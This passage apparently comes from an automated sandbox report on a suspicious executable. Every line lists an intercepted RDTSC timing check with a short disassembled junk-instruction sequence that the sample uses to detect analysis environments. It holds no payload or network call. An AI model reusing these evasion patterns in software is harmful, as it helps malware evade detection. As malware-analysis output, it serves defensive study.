                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 484933 second address: 484937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4247D3 second address: 4247D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 484A84 second address: 484AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE311181216h 0x0000000a popad 0x0000000b pushad 0x0000000c jng 00007FE311181216h 0x00000012 jl 00007FE311181216h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b pop eax 0x0000001c popad 0x0000001d rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 48AD5B second address: 48AD7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A4h 0x00000007 pushad 0x00000008 je 00007FE310CDC396h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 48AD7A second address: 48AD8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE31118121Bh 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 491272 second address: 491278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 491278 second address: 4912A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007FE311181216h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FE31118121Dh 0x00000011 popad 0x00000012 pushad 0x00000013 jo 00007FE31118121Ah 0x00000019 push esi 0x0000001a pop esi 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4912A1 second address: 4912A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4912A5 second address: 4912B8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE311181216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jno 00007FE311181216h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 49209B second address: 49209F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 49209F second address: 4920BB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FE31118121Bh 0x0000000d pushad 0x0000000e jo 00007FE311181216h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 492421 second address: 49243A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FE310CDC3A3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 492D32 second address: 492D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 492D36 second address: 492D67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007FE310CDC3A7h 0x0000000f pop esi 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 498040 second address: 49805A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181226h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 49805A second address: 498064 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE310CDC3A8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 497410 second address: 497414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 497414 second address: 49741A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 49798F second address: 497993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 497993 second address: 497997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 49C9AE second address: 49C9B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 49C9B4 second address: 49C9B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 49C9B8 second address: 49C9BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4A3D14 second address: 4A3D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4A3D18 second address: 4A3D1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4A4D37 second address: 4A4D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FE310CDC396h 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4A4D41 second address: 4A4D53 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE311181216h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4A5416 second address: 4A5447 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jp 00007FE310CDC396h 0x0000000b jnp 00007FE310CDC396h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jl 00007FE310CDC396h 0x0000001a jmp 00007FE310CDC3A7h 0x0000001f rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4A5447 second address: 4A544B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4A544B second address: 4A547C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE310CDC3A5h 0x0000000f jng 00007FE310CDC3A2h 0x00000015 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4A547C second address: 4A548E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FE31118121Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4A94BC second address: 4A94D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE310CDC3A2h 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4AD097 second address: 4AD09D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4AD09D second address: 4AD0A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4AD0A1 second address: 4AD0B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FE311181216h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4AD0B3 second address: 4AD0CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4AD3E9 second address: 4AD3ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4BDB3C second address: 4BDB40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4BDB40 second address: 4BDB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FE311181216h 0x0000000d jmp 00007FE311181227h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4C0A07 second address: 4C0A5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FE310CDC39Ch 0x0000000f jmp 00007FE310CDC39Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FE310CDC3A9h 0x0000001b jmp 00007FE310CDC39Dh 0x00000020 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4C06DA second address: 4C06E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FE31118121Eh 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4CD510 second address: 4CD516 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4CD3AD second address: 4CD3B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4CD3B5 second address: 4CD3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FE310CDC396h 0x0000000a popad 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4CD3C0 second address: 4CD3C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4CD3C6 second address: 4CD3CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4D5083 second address: 4D50AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE31118121Bh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edx 0x0000000d jmp 00007FE311181223h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4D50AB second address: 4D50B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4D5208 second address: 4D5225 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE311181216h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007FE311181218h 0x00000012 pushad 0x00000013 jo 00007FE311181216h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4D5225 second address: 4D5230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4D5230 second address: 4D526B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE311181226h 0x00000009 jmp 00007FE31118121Ch 0x0000000e jmp 00007FE311181224h 0x00000013 popad 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4D5798 second address: 4D579D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4D9838 second address: 4D983C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4D983C second address: 4D9855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE310CDC39Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4D9855 second address: 4D9859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4D9859 second address: 4D985D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4D985D second address: 4D988D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE31118121Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FE311181223h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007FE311181222h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4D988D second address: 4D989B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FE310CDC396h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4D989B second address: 4D98A7 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE311181216h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4D98A7 second address: 4D98B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE310CDC39Eh 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4D98B9 second address: 4D98BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4D99FD second address: 4D9A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FE310CDC396h 0x0000000f jc 00007FE310CDC396h 0x00000015 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4E85E8 second address: 4E85F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE31118121Bh 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4E85F7 second address: 4E860C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC39Fh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4E61FA second address: 4E6202 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4E6202 second address: 4E620E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4F7904 second address: 4F7914 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007FE311181216h 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4F7914 second address: 4F792E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE310CDC3A6h 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4FA589 second address: 4FA5CE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE311181216h 0x00000008 jmp 00007FE31118121Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FE311181225h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FE311181229h 0x0000001c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4FA5CE second address: 4FA5E1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE310CDC39Ch 0x00000008 jc 00007FE310CDC396h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4FA5E1 second address: 4FA5ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FE311181216h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4FA289 second address: 4FA28D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4FA28D second address: 4FA2A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FE31118121Ch 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4FA2A4 second address: 4FA2AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4FA2AD second address: 4FA2B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4FA2B3 second address: 4FA2C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jnp 00007FE310CDC3B0h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 511DC0 second address: 511DC6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 511DC6 second address: 511DCB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 510E23 second address: 510E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 511107 second address: 511117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FE310CDC396h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 511247 second address: 51124B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 51124B second address: 511271 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FE310CDC3A0h 0x0000000e jmp 00007FE310CDC39Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007FE310CDC396h 0x0000001b jnp 00007FE310CDC396h 0x00000021 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 51195C second address: 511962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 511962 second address: 511966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 511AC1 second address: 511AC7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 511AC7 second address: 511ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 511ACD second address: 511AD8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007FE311181216h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 51620A second address: 51620F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 517B9D second address: 517BD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181229h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007FE311181216h 0x00000013 jmp 00007FE31118121Fh 0x00000018 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 517BD3 second address: 517C00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007FE310CDC3B2h 0x0000000f jc 00007FE310CDC39Ch 0x00000015 jbe 00007FE310CDC396h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 517C00 second address: 517C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0C27 second address: 52C0C42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0C42 second address: 52C0C60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FE31118121Fh 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0C60 second address: 52C0C77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
